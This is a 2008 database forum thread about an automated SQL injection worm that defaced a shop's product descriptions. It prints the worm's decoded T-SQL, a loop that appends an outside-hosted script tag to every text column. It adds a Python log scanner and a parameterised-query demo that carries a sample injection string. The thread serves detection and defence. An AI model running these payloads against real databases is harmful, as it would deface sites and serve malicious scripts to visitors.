Rob K
Starting Member
9 Posts
Posted - 2008-05-13 : 07:52:02

I have an ASP website that uses SQL 2005. For the last 2 nights someone has hacked the DB and added a url with a script to the end of my product descriptions; the script is located on another server which is infected with viruses. For example, a field should read 'Clothing'; when it gets hacked it reads 'Clothing <Script... blah blah here>'. I have restored the DB each time but I cannot find how they are doing this. The Windows Firewall is blocking any ext SQL connections so I am guessing there is something local that is doing this. Any ideas where to look for clues? Thanks.

harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts
Posted - 2008-05-13 : 07:53:29

SQL Injection will be my first guess.

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"

Rob K
Starting Member
9 Posts
Posted - 2008-05-13 : 08:05:49

quote: Originally posted by harsh_athalye
SQL Injection will be my first guess.

Ok, not being a SQL expert, can you help me out here: where would I look to find if that is it?

harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts

Rob K
Starting Member
9 Posts
Posted - 2008-05-13 : 08:17:04

Ok, thanks v much for that.

Rob K
Starting Member
9 Posts
Posted - 2008-05-13 : 09:57:30

If it is a SQL injection, would that be in a log somewhere?

pootle_flump
1064 Posts
Posted - 2008-05-13 : 11:51:33

Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection.

nheidorn
Starting Member
28 Posts
Posted - 2008-05-13 : 12:29:46

Sounds like you might have been hit by the Automated SQL Injection Worm that is going around. You can read more here: http://isc.sans.org/diary.html?storyid=4393

Rob K
Starting Member
9 Posts
Posted - 2008-05-13 : 12:38:40

Great, I have blocked the IPs mentioned on that link.

GilaMonster
Master Smack Fu Yak Hacker
4507 Posts
Posted - 2008-05-14 : 02:36:08

If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them. Restrict your database user to have only execute permissions on the stored procs and nothing else.

--Gail Shaw

SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-05-14 : 02:56:00

Where is the post Jeff made where he dissected the binary string into T-SQL?

E 12°55'05.25"N 56°04'39.16"

GilaMonster
Master Smack Fu Yak Hacker
4507 Posts
Posted - 2008-05-14 : 03:58:44

quote: Originally posted by Peso
Where is the post Jeff made where he dissected the binary string into T-SQL?

If you find it, I'd very much like to see it.

--Gail Shaw

SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-05-14 : 04:16:05

I remember it was something about

SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE DATA_TYPE IN ('VARCHAR', 'CHAR', 'TEXT')

E 12°55'05.25"N 56°04'39.16"

SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-05-14 : 04:23:40

The cleartext code looked similar to this

DECLARE @T varchar(255),@C varchar(255)
-- xtype 99=ntext, 35=text, 231=nvarchar, 167=varchar: every string column of every user table
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

E 12°55'05.25"N 56°04'39.16"

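Rob asked earlier whether an injection shows up in a log, and Peso asked for the post that dissected the binary string back into T-SQL. Both questions have the same answer: SQL Server only ever saw a legitimate-looking batch, but the HTTP request that delivered it is in the IIS web log, with the statement hidden inside a CAST(0x... AS VARCHAR(4000)) hex literal. The following scanner is an added example for this thread, not code from the forum, from Jeff's post or from any product. It walks constructed IIS W3C log lines (the field layout, addresses and timestamps are all made up for the example), URL-decodes each query string, decodes any long hex literal it finds, and flags requests that contain T-SQL tokens either in the clear or inside the decoded literal; the hex payload is built from a constructed fragment modelled on the cursor loop quoted above. It also handles the NVARCHAR (UTF-16LE) variant of the payload, which the thread does not show.

```python
"""Scan IIS W3C log lines for hex-encoded T-SQL riding in the query string.

Added example for this thread, not code from the forum or from any product.
All log lines and the reduced field layout below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Constructed cleartext fragment, modelled on the cursor loop quoted in the thread.
SAMPLE_SQL = ("DECLARE @T varchar(255),@C varchar(255) "
              "DECLARE Table_Cursor CURSOR FOR "
              "select a.name,b.name from sysobjects a,syscolumns b")

# The same fragment as the worm would ship it: a hex literal inside CAST().
SAMPLE_HEX = SAMPLE_SQL.encode("ascii").hex().upper()

# Constructed log lines in a reduced W3C layout:
# date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
LOG_LINES = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-05-13 02:14:07 10.0.0.5 GET /product.asp id=42 192.0.2.10 200",
    "2008-05-13 02:14:09 10.0.0.5 GET /product.asp id=42;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x" + SAMPLE_HEX + "%20AS%20VARCHAR(4000));EXEC(@S);-- 198.51.100.7 200",
    "2008-05-13 02:15:01 10.0.0.5 GET /product.asp id=43&sort=price 192.0.2.10 200",
]

# A hex literal long enough to hold a statement; short values like 0x1A are ignored.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{8,})")
# T-SQL tokens that have no business in a product id.
SUSPICIOUS = re.compile(r"\b(DECLARE|EXEC|CAST|CURSOR|UPDATE|SYSOBJECTS)\b", re.IGNORECASE)


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the digits after 0x into text; handles VARCHAR and NVARCHAR payloads."""
    if len(hex_digits) % 2:          # an odd digit count cannot be whole bytes
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    # An NVARCHAR payload is UTF-16LE, so every second byte of ASCII text is NUL.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def parse_w3c_line(line: str) -> dict:
    """Split one log line into the fields this example uses (constructed layout)."""
    f = line.split(" ")
    return {"time": f[0] + " " + f[1], "stem": f[4],
            "query": unquote_plus(f[5]), "client": f[6]}


def scan_log(lines):
    """Return one finding per request whose query string carries T-SQL, plain or hex."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        rec = parse_w3c_line(line)
        decoded = [decode_hex_literal(h) for h in HEX_LITERAL.findall(rec["query"])]
        visible = rec["query"] + " " + " ".join(decoded)
        keywords = sorted({k.upper() for k in SUSPICIOUS.findall(visible)})
        if keywords:
            findings.append({"time": rec["time"], "client": rec["client"],
                             "stem": rec["stem"], "keywords": keywords,
                             "decoded": decoded})
    return findings


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["time"], hit["client"], hit["stem"], ", ".join(hit["keywords"]))
        for sql in hit["decoded"]:
            print("  decoded:", sql)
```

Run against a real IIS log, the only change needed is the column positions in parse_w3c_line, which should be read from the #Fields: header rather than hard-coded as they are here. The decoded text is what to compare against the cleartext above, and the client address is what Rob blocked.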
SwePeso
Patron Saint of Lost Yaks
30421 Posts

GilaMonster
Master Smack Fu Yak Hacker
4507 Posts
Posted - 2008-05-14 : 05:00:52

Hmm. SQL Injection and XSS all in one. Interesting. Not close to as damaging as it could have been.

--Gail Shaw

SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-05-14 : 05:07:13

I agree. The attack could have encrypted all columns! I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database. Always use parameterised queries as a first line of defence.

E 12°55'05.25"N 56°04'39.16"

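To make the advice from GilaMonster and Peso concrete, here is the concatenated lookup beside its parameterised form, as an added example for this thread and not code from the forum or from any product. SQLite and Python's sqlite3 module stand in for SQL Server 2005 and ADO (in classic ASP the parameterised form is an ADODB.Command with Parameters added, not a string handed to Connection.Execute). The table, the rows and the hostile input are constructed; the input mirrors the thread's attack, a second statement riding on the product id that appends a script tag to every description, with a placeholder host name.

```python
"""Concatenated versus parameterised lookup, as an added example for this thread.

Not code from the forum or from any product.  SQLite stands in for SQL Server;
the payload and the data are constructed, and the host name is a placeholder.
"""
import sqlite3

# Constructed payload: a legitimate-looking id followed by a trailing UPDATE.
INJECTED_ID = ("42; UPDATE products SET description = description || "
               "'<script src=http://placeholder.example/x.js></script>'")


def fresh_db() -> sqlite3.Connection:
    """In-memory products table with the two rows the example needs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, description TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(42, "Clothing"), (43, "Shoes")])
    db.commit()
    return db


def lookup_concatenated(db, product_id: str):
    """The pattern the thread warns against: user input glued into the SQL text."""
    sql = "SELECT description FROM products WHERE id = " + product_id
    rows = []
    # SQL Server runs every statement in the batch it is handed.  sqlite3's execute()
    # refuses multi-statement strings, so the batch is split by hand to emulate that.
    for statement in (s.strip() for s in sql.split(";")):
        if statement:
            rows = db.execute(statement).fetchall()
    db.commit()
    return rows


def lookup_parameterised(db, product_id: str):
    """The value is bound as a parameter and never becomes SQL text; the whole
    hostile string is compared against id as data and matches nothing."""
    return db.execute("SELECT description FROM products WHERE id = ?",
                      (product_id,)).fetchall()


def descriptions(db):
    """Current description column in id order, to inspect side effects."""
    return [d for (d,) in db.execute("SELECT description FROM products ORDER BY id")]


def demo():
    """Run the same hostile input through both paths; return what each left behind."""
    vulnerable = fresh_db()
    lookup_concatenated(vulnerable, INJECTED_ID)
    hardened = fresh_db()
    rows = lookup_parameterised(hardened, INJECTED_ID)
    return descriptions(vulnerable), rows, descriptions(hardened)


if __name__ == "__main__":
    tainted, rows, clean = demo()
    print("concatenated :", tainted)   # every description now ends in a script tag
    print("parameterised:", rows, clean)
```

The parameterised path returns no row for the hostile input and leaves the table untouched, while the concatenated path silently runs the trailing UPDATE, which is exactly the symptom Rob described. What SQLite cannot show is GilaMonster's second layer, a database login that holds nothing but EXECUTE on the stored procedures; with that in place, an injected UPDATE against the base table would fail on permissions even if the application code slipped.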
Byapti
Starting Member
1 Post
Posted - 2008-05-14 : 05:53:48

Hi, I think the "Testing For SQL Injections" article on http://www.stickyminds.com/sitewide.asp?Function=edetail&ObjectType=ART&ObjectId=11923&tth=DYN&tt=siteemail&iDyn=2 may be helpful in this discussion. This popular white paper is written by a software engineer from our organization Mindfire Solutions (http://www.mindfiresolutions.com). I hope you find it useful!

Cheers,
Byapti

SwePeso
Patron Saint of Lost Yaks
30421 Posts
Posted - 2008-05-14 : 06:03:24

Is it really "a vulnerability at database layer"? The database is just performing what the front-end application tells it to.

E 12°55'05.25"N 56°04'39.16"

GilaMonster
Master Smack Fu Yak Hacker
4507 Posts
Posted - 2008-05-14 : 07:47:36

quote: Originally posted by Peso
I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database. Always use parameterised queries as a first line of defence.

Considering all the posts here and on Central in the last couple of weeks, I somehow doubt it.

--Gail Shaw

harsh_athalye
Master Smack Fu Yak Hacker
5581 Posts
Posted - 2008-05-14 : 07:59:37

Only experience can teach them then!

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"
